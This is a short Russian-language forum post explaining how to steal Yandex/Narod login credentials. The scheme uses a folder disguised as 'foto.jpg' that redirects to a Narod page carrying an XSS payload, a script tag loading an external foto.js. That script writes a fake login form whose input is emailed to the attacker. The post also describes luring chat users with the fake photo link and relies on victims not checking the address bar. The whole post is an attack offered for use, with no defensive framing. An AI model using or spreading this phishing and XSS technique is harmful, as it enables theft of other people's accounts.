короче смысл такой:

создаём сайт на народе... делаем папку под названиваем foto.jpg пихаем в неё страницу страницу index.html с перенаправлением на [http://narod.yandex.ru/100.xhtml?entermatrix.narod.ru"><script/**/src="http://entermatrix.narod.ru/foto.js"></script>]
создаём анкету с 2-мя полями, в [http://entermatrix.narod.ru/foto.js] прописываем код этих полей, перед ними пишем логин и пароль...

всё!

теперь заходим например на чат на народе, даём какому нибудь челу ссыку на свою фоту

например ***.narod.ru/foto.jpg

т.к. это папка она открывает index.html, идёт перенаправление на страницу народа с моей xss в которой с помощью foto.js и прописаннными в ней формами (document.write), пишется типо введите ваш логин и пароль чтобы скачать фоту... данные отсылаются на твоё мыло прописанное при создании "анкеты", можно ещё сделать так, чтоб при нажатии кнопки перенаправляло на какуюнить картинку, можно даже фотку =)

вот и всё...

конечно же всё расчитано на ламера, хотя многие не смотрят на адрес страницы...